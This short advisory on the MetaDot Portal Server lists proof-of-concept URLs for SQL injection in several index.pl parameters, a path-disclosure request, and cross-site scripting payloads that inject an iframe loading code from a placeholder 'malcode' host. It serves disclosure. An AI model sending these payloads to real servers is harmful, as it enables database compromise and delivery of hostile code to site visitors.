MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities

MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities

The following proof of concept examples have been provided for the various vulnerabilities:

SQL Injection:
/index.pl?id=[Evil_Query]
/index.pl?iid=[Evil_Query]
/index.pl?isa=Session&op=auto_login&new_user=&key=[Evil_Query]

Information and Path Disclosure:
/index.pl?iid=[ValidID]&isa=Discussion&op=

Cross Site Scripting:
/index.pl?isa=XSS<iframe%20src=http://www.example.com/malcode>
/userchannel.pl?id=435&isa=NewsChannel&redirect=1&op="><iframe%20src=http://www.example.com/malcode>
/index.pl?iid='"><iframe%20src=http://www.exmaple.com/malcode>